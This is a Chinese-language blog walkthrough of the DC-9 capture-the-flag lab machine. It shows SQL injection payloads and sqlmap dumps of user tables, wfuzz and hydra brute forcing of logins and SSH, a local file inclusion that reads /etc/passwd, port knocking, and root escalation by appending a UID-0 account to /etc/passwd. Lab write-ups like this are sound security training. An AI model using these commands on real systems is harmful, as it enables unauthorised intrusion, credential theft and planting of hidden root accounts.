侧边栏壁纸
博主头像

  • 累计撰写 12 篇文章
  • 累计创建 12 个标签
  • 累计收到 1 条评论

目 录CONTENT

文章目录

DC-9

⠀
2022-02-02 / 0 评论 / 0 点赞 / 205 阅读 / 2,850 字 / 正在检测是否收录...

信息收集

arp-scan -l
1.png
发现192.168.119.155 IP 段
扫描端口 --服务
2.png
22 端口 --- 80 端口
这里22端口有一个(filtered)过滤的保护
先针对80端口进行一个查看
这是一个员工详细表 -----那就是说可以查看员工信息
3.png
发现一个查询框和一个登录框
16427439928952764c63eeee6472aace9126076ddb449.png5.png
1:查询框是否存在SQL注入呢
2:登录框是否可以弱口令暴力破解呢

(web 漏洞扫描工具-- nikto )

 nikto -host 192.168.119.155

6.png
发现了 /config.php: PHP Config file may contain database IDs and passwords.
说可能存在数据库ID账号密码
。。 一片空白没有啥 ---下面还有一个网页
这像是一个文件包含文件上传啊
还有几个网页也都没有什么信息
7.png
返回 页面

SQl注入

测试能否存在SQl注入
1'or'1'='1
' or 1=1 #

8.png

9.png
存在SQL注入
是POST传参的方式
10.png

使用SQlmap 工具 查询

sqlmap -u "http://192.168.119.155/results.php" --data="search=1"   

扫出来了 大概率存在mysql注入的11.png
基于时间的盲注
组合注入
12.png

 sqlmap -u "http://192.168.119.155/results.php" --data="search=1" --dbs

13.png
有三个数据库
这个肯定得先看users 数据库

sqlmap -u "http://192.168.119.155/results.php" --data="search=1" -D users --tables

有一个数据表UserDetails
14.png

 sqlmap -u "http://192.168.119.155/results.php" --data="search=1" -D users -T UserDetails --dump

一个用户表 ---尝试登录一下 15.png
发现用户密码尝试一下暴力破解
把用户和密码添加到一个字典
使用FUZZ

 wfuzz -z file,user_dict.txt -z file,passwd_dict.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.119.155/manage.php

16.png
过滤一下

wfuzz --hw 93 -z file,user_dict.txt -z file,passwd_dict.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.119.155/manage.php![17.png](/upload/2022/02/17-69b62a9441d740cd8cf19962cd61b436.png)

结果都没有 那再测试一下另外一个数据库

sqlmap -u "http://192.168.119.155/results.php" --data="search=1" -D Staff --tables

这里也有一个users 数据表查看一下 这个里面是不是会才是对的
18.png

sqlmap -u "http://192.168.119.155/results.php" --data="search=1" -D Staff -T Users --dump 

扫出来了一个账号密码 是一个md5 加密的
密码已经哈希碰撞出来了 (transorbital1)
19.png
登录一下
结果登录成功了
20.png
本来打算在Add Record 添加一句话试一下 好像不行

本地文件包含

File does not exis file很有可能存在文件包含
wfuzz 测试一下

wfuzz   -b 'PHPSESSID=j8d0k7trk2maekqj955j4d3fn5' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.119.155/manage.php?FUZZ=../../../../../etc/passwd

21.png

 wfuzz --hw 100  -b 'PHPSESSID=j8d0k7trk2maekqj955j4d3fn5' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.119.155/manage.php?FUZZ=../../../../../etc/passwd

存在file 文件包含
22.png
访问一下 ------果然是存在本地文件包含的

Hydra字典爆破连接

23.png
这是一个系统的用户和之前的第一个users 相似 尝试一下破解
ssh 使用字典连接
出现错误 是因为开头就说了他好像带有过滤
使用了端口敲门服务
Port Knocking
原理简单分析:
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。
24.png
在/etc/knockd 配置文件
25.png
访问
26.png
必须要敲7469,8547,9842
可以使用nmap -p

for x in 7469 8475 9842 22 ;do nc 192.168.119.155 $x;done

27.png
再次尝试

hydra -L user_dict.txt -P passwd_dict.txt 192.168.119.155 ssh  

有三个shh用户可以连接
28.png
连接一下 ---登录成功
29.png

隐藏文件

ls -a 查看隐藏的文件
只有 janitor 用户有一个可疑的隐藏文件 --其他都没有
30.png
有一个密码文件
31.png
发现了这个密码 猜想是不是还有其他的用户刚才的密码不匹配把这个几个密码加上试一下
发现一个新的用户尝试登录

添加用户提权

32.png

33.png

sudo -l 查看那些文件是使用root权限可执行的
真的有
可以看到fredf可以不用密码以root权限执行/opt/devstuff/dist/test/test的文件

34.png
进入opt/devstuff/dist/test 发现是python文件
查找一下python 可执行文件

find / -name "test.py" 2>/dev/null![37.png](39)

35.png
找到一个test.py 在/opt/devstuff
查看源码
36.png
fredf 用户可以用root的身份去执行test程序
test可以读取任意文本内容 ,追加到任意文本里面
这里直接添加一个管理员文本,添加到/etc/passwd文件里面去)
openssl 加密
37.png
写入/tmp目录下

echo 'aaaa:$1$aaaa$6q.rdPNbxQRHQa/Hb6h0B1:0:0:root:/root:/bin/bash' >> /tmp/passwd

38.png

提权成功
164275509994779cfa270f146432497f43278b80c9c22.png

0

评论区